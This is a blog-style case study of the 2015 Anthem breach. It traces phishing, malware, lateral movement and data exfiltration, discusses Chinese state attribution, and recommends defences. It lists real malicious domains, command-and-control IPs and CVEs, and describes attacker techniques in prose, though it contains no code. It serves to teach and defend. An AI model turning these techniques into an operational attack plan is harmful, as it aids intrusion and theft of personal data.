Take Out — How Anthem was Breached

The fourth anniversary of the Anthem data breach is an opportunity to reflect upon computer system failures, human error, process flaws, organizational mistakes, and the best principles and practices for solution delivery in the IT industry. In this blog and my upcoming book, Bugs: A Short History of Computer System Failure, I will chronicle some important system failures in the past and discuss ideas for improving the future of system quality. As information technology becomes increasingly woven into Life, the quality of hardware and software impacts our commerce, health, infrastructure, military, politics, science, security, and transportation. The Big Idea is that we have no choice but to get better at delivering technology solutions because our lives depend on it.

On February 4 2015, Anthem, a major health insurance company in the USA, announced to the general public that a computer hacker had gained access to its database and that 78.8 million records of Personal Identification Information (PII) were exposed including name, address, birth date, Medical ID, and Social Security Number (SSN). In the weeks and months that followed, investigators learned that Anthem employees had been targeted by a cyber warfare group affiliated with the government of the People’s Republic of China (PRC); this group which went by aliases such as “Deep Panda” and “Black Vine” had launched a sophisticated attack that tricked users with phishing emails connected to malicious websites masquerading as internal services, downloaded malware that infected their machines, and then compromised multiple user accounts throughout the Anthem network until the attackers were able to access and exfiltrate the corporate data warehouse containing the customer PII data. Anthem spent approximately $230 million on the cleanup of the data breach; it included purchasing a cyber security insurance policy, settling class-action lawsuits, and paying for additional security services and cyber defenses. For full disclosure to the reader, I was a customer of Anthem at the time of the event and was affected it. This essay will discuss details of the data breach made public, the business and technology factors that contributed to the system failure, and how to prevent such incidents from happening to your organization.

Headquartered in Indianapolis, Anthem grew from the union of two Indiana-based insurance companies, Mutual Hospital Insurance Inc and Mutual Medical Insurance Inc formed in 1944 and 1946, respectively. Anthem eventually became a publicly traded corporation in 2001; in so doing, it consolidated the Blue Cross Blue Shield organizations of several states to achieve further economies of scale. In November 2004, Anthem and WellPoint merged to become the leading health benefits corporation in the USA and the largest for-profit licensee within the Blue Cross and Blue Shield Association. Through its portfolio of healthcare plans and services, Anthem serves over 40 million members and operates in 19 states; 1 in 8 Americans are covered by Anthem, and interestingly from a reconnaissance perspective, about in 1 in 2 US federal government employees. For fiscal year 2017, Anthem reported US$ 3.8 billion in earnings with annual revenue of $90 billion; it handled more than 50 million service calls and processed more than 700 million claims in 2017.

Threat Connect Analysis of Anthem Data Breach

According to multiple documents published by Symantec, ThreatConnect, and the US government, a system administrator in Anthem’s Amerigroup subsidiary opened a phishing email with a malicious attachment and embedded links to typosquat web sites controlled by the Deep Panda group in early 2014. The fake sites including myhrsolutions.we11point.com, extcitrix.we11point.com, prennera.com, and sharepoint-vaeit.com were used to pose as legitimate HR and IT services within the Anthem and Blue Cross enterprise network; instead, they hosted command-and-control infrastructure for the Mivast and Sakula malware digitally signed by certificates stolen from DTOPTOOLZ, a Korean software company. According to Symantec, Mivast and Sakula shared the following capabilities: open an I/O pipe as a backdoor command-and-control communications channel, execute files and commands, delete, modify, and create Windows registry keys, as well as collect and send information about the infected computer. In addition to the disguised host name, the malware was themed as an Adobe Reader, Juniper VPN, or Microsoft ActiveX Control application to further appear innocent to the user. Once the attacker controlled the sysadmin’s account and computer, they began to move laterally within Anthem’s network eventually compromising and escalating privileges on dozens of more user accounts as they discovered additional target systems. On December 10, 2014, the attacker queried and exfiltrated the PII data from the corporate data warehouse. The suspiciously large query was however logged, and subsequently noticed by Anthem’s IT department on January 26, 2015. Three days later, Anthem shut down the sysadmin account and then notified federal authorities as well as other regulatory entities. The we11point.com domain had been originally registered on April 21, 2014; the registrant’s address was later obfuscated from China to the Cayman Islands. Further analysis by ThreatConnect of the malware’s network traffic callbacks resolved to IP addresses 198.200.45.112 and 192.199.254.126 that pointed to a suspicious domain (topsec2014.com) and registrant email address (topsec_2014@163.com).

Topsec Information Security Research Center of Southest University

ThreatConnect investigated the usage of “topsec2014@163[.]com” and connected it to Professor Song Yubo who was running an active information security competition sponsored by the Topsec Information Security Research Center (TISRC) of Southeast University located in Nanjing, China. This entity appears to be a joint venture between the university and Beijing Topsec, a major Chinese telecommunications and IT security company. In 1996, Topsec was the first Chinese company to release an indigenously-manufactured firewall hardware appliance. In March 2012, Northrop Grumman had presented a commissioned report to Congress describing Chinese cyber warfare capabilities; the report asserted that Professor Song and the TISRC had received numerous state-sponsored research grants related to computer security research, development, and operations. Topsec has connections to the Chinese government, is a People’s Liberation Army (PLA) vendor with military clearance, and had provided networking and cybersecurity services to several high profile national events including the 2008 Beijing Olympics, Shanghai 2010 Expo, as well as the launches of the Tiangong-1 space station and Shenzhou spacecrafts.

Moreover, Symantec postulated that the geography of the network infrastructure, variants of malware, and digital certificates used against Anthem were also associated with the Deep Panda group. Since 2012, the Deep Panda organization had launched multiple cyber warfare campaigns targeting organizations in important industries including aerospace, energy, finance, military, and technology and focusing on digital assets such as Intellectual Property and PII; 82% of the victims were located in the USA, with 4% in Canada in China, 3% in Denmark and Italy, and 2% in India. Furthermore, Deep Panda had a history of exploiting zero-day vulnerabilities at the same time as other cyber criminal groups, and Symantec suggested that Deep Panda was actively using the Elderwood platform to distribute the exploits, typically using spear phishing emails, watering holes, and web injection. Some of the remote code execution vulnerabilities from the Elderwood program included Adobe Flash Player Object Type Confusion (CVE-2012–0779), Microsoft IE Same ID Property (CVE-2012–1875), and Microsoft XML Core Services (CVE-2012–1889). In addition to these sophisticated exploits, Deep Panda used a more standard toolkit once inside the enterprise network including ping to identify other machines, Powershell to download and execute programs in memory without writing to disk, Windows Management Instrumentation (WMI) for lateral movement, process discovery using the Microsoft tasklist.exe utility, and net.exe to connect to administrative network shares with compromised credentials.

McKinsey Cybersecurity Policy Framework

One may well wonder how to defend themselves and their organizations against such powerful and patient adversaries. There are several principles and practices for preventing, detecting, and reacting to an electronic data breach based on the cybersecurity policy frameworks from the US National Institute of Standards and Technology (NIST), Center for Internet Security (CIS/SANS), and ISO 27001.

• Identify and Inventory the assets that are important to your organization. It could be Intellectual Property (IP), financial data, patient information, e-mail, business processes like trading, payments, research, document approval, or supply chains, as well as physical facilities and devices (e.g. drones, planes, cars, robots), etc.
• Prioritize what you need to Protect. Not all assets are created equal. Make sure you have identified and secured the most critical assets.
• Assess the Gaps of current Defenses and improve the areas where the Risks to critical assets are highest. Secure configuration for hardware and software on mobile devices, laptops, workstations, and server. Maintain, monitor, and analyze audit and security logs. Protect corporate email and web browsers which are common attack vectors. Limit and control network ports, protocols and services using firewalls and intrusion detection systems (IDS). Secure configuration for network devices such as firewalls, routers, and switches. Invest in data backup, protection, and recovery capabilities. Monitor the OWASP Top 10 and SANS Top 25 to appreciate how threats change over time. Patch servers, applications, and devices for major vulnerabilities, and do so regularly. Document and write document policies and procedures for cybersecurity. Anthem should have considered enforcing Two-Factor Authentication (2FA) to prevent the misuse of sysadmin credentials and reduce the impact of a hacked account. It also should have had stronger automated email controls such as an email proxy service for blocking spam, removing suspicious file attachments, and disabling web links embedded in email.
• Educate employees and contractors within the organization on computer security hygiene, organization policy, and the consequences of non-conformance. Individuals should be as careful opening emails as they would be opening the door to their home. Implement a security training program for application software engineers and system administrators.
• Assess Data storage and security. What data is stored? Is it financial, PII, or HIPAA-related? What government regulations and legal jurisdictions cover that information? What components control access to the data? How are users authenticated and authorized? Is user activity logged? Is data encrypted, and if so, how are encryption keys managed? Block data distribution methods that violate company policy (e.g. USB drive, Drop Box, etc) so that even if a hacker breached the network, they will find it difficult to extract the data. Another more complex approach involves partitioning data across multiple servers or locations. Furthermore, the adverse impacts of healthcare data breaches warrant increased penalties upon organizations fail to secure data covered by HIPAA including identity theft, insurance fraud, loss of personal privacy, blackmail, disruption of healthcare services, and espionage. As noted earlier, 1 out of 2 federal government employees were members of Anthem; no PII data dump from Anthem’s database has not appeared for sale yet on the dark web, suggesting the hack was not done for short-term monetary reward. Rather, it may well be that the foreign state actors involved sought medical information about US officials to identify health vulnerabilities and thereby gain an advantage in future business or diplomatic negotiations.
• Monitor and control User accounts. Limit usage of system administrative privileges and separate concerns so that few users if any have complete power within the enterprise. For example, two people must provide separate keys to open a bank safe, two people are required to sign checks over a certain amount, and two individuals are required to offer their fingerprint or retinal scan to turn the nuclear missile launch keys. Compromised network user credentials should not have allowed database administrator (DBA) permissions. There should be different role definitions with different levels of access and permissions for the DBA, system architect, application lead, support analyst, and business users.
• Define an Incident Response (IR) plan to react intelligently and recover quickly if and when the worst case happens. Like fire extinguishers, regular planning and practice improve outcomes.
• Conduct penetration tests and Red Team exercises on high value assets to assess defenses.
• If you are an individual consumer affected by a data breach involving PII, request a security freeze on your credit file with the major credit reporting companies (e.g. Transunion, Equifax, and Expersian). Also consider establishing ID protection and credit monitoring services. Change your passwords on critical accounts and/or assess using Password manager software. Update the vulnerability scanner on your workstation and mobile devices.

Fake we11point.com site that tricked Anthem employees

Anthem paid a price for the data breach, with financial costs totaling more than $230 million. It settled with the federal Office of Civil Rights (OCR) for a $16 million fine. Anthem also sent letters to the 78.8 million affected customers by USPS, and it offered free credit monitoring and ID protection services for up to 24 months. Anthem spent $115 million to settle civil class action lawsuits, and it purchased an insurance policy from American International Group (AIG) worth $100 million to cover incident fallout. It paid $2.5 million to Mandiant to assist with the investigation and recommend a remediation plan. Beyond the monetary expenses, Anthem also suffered reputational damage with its business and retail customers and has undergone greater regulatory scrutiny. Now consider that Anthem had already experienced multiple data breach events in the past. In January 2007, Wellpoint announced that 196,000 members had their PII (including SSN) exposed when backup tapes in a lockbox were stolen from a vendor, Concentra. In February 2010, a former Anthem employee pled guilty to ID theft involving at least 40 other employees’ PII. In July 2011, Anthem settled a lawsuit that alleged that from October 2009 to March 2010, Anthem improperly stored PII and electronic versions of individual health insurance applications for over 600,000 customers without username, password, or encryption protection due to an improper maintenance upgrade performed by a vendor. As some cyber security and privacy experts such as Bruce Schneier and the EFF have noted, data breaches are an economic externality much like pollution to the air and water; there may be a short-term punishment for the responsible organization, but the long-term effects, costs, and risks are borne by individuals and society. Citizens, academics, and policy makers must demand from government and corporations that data be declared a toxic asset that needs to be regulated, reported, and secured as carefully as we do with nuclear waste.

Enjoy the article? Follow me on Medium and Twitter for more updates.

References

• http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf
• https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/
• http://www.cyberlessonslearned.com/cll001-anthem/
• https://www.bankinfosecurity.com/new-in-depth-analysis-anthem-breach-a-9627
• http://www.insurance.ca.gov/0400-news/0100-press-releases/2016/upload/Anthem-Examination-Report-AM-2016-12-01.pdf
• https://www.antheminc.com/AboutAnthemInc/CompanyHistory/index.htm
• https://resources.infosecinstitute.com/category/healthcare-information-security/healthcare-attack-statistics-and-case-studies/case-study-health-insurer-anthem/
• https://www.schneier.com/blog/archives/2016/03/data_is_a_toxic.html
• https://www.gao.gov/assets/680/679260.pdf
• https://documents.trendmicro.com/assets/wp/wp-analyzing-breaches-by-industry.pdf
• http://anthemfacts.com/cyber-attack
• https://attack.mitre.org/groups/G0009/
• https://www.databreaches.net/how-many-breaches-has-anthem-had/

This story is published in The Startup, Medium’s largest entrepreneurship publication followed by +424,678 people.

Subscribe to receive our top stories here.